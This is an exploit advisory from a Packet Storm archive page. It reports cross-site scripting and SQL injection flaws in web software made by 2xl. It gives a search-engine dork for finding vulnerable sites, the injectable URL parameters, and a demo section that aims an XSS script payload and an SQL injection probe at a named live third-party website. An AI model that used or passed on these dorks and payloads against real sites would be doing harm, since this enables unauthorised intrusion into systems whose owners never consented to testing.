2xl Cross Site Scripting / SQL Injection

2012-09-21T00:00:00
ID PACKETSTORM:116777
Type packetstorm
Reporter Net.W0lf
Modified 2012-09-21T00:00:00

Description

                                        
                                            `################################################################  
----------------------------------------------------------------  
2xl XSS/SQL Injection Vulnerability  
----------------------------------------------------------------  
################################################################  
# Exploit Title : 2xl XSS/SQL Injection Vulnerability  
# Author : Hack Center Security Team  
# Discovered By : Net.W0lf  
# Software Link : [ www.2xl.co.za ]  
# Impact : [ High ]  
# E-Mail : Bl4ck.Intell@gmail.com   
# Dork : intext:" Site by 2xl "  
################################################################  
----------------------------------------------------------------  
+-----------------------+  
| Cross Site scripting |  
| SQL Injection |  
+-----------------------+  
  
Expl0!T :  
XSS :  
[TarGeT]/search.php?p=7  
SQL :  
[TaRgeT]/view_product.php?p=&id=[SQL]  
  
  
Dem0:  
XSS :  
Search This Text : <script>alert(/0/)</script>  
To This Page : www.lpcreative.co.za/search.php?p=7  
SQL :  
wwww.lpcreative.co.za/view_product.php?p=&id='  
  
Greets To :  
  
| Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.com |  
| And All Iranian Black Hat HackerZ |  
  
===========================================# End #=============================================  
`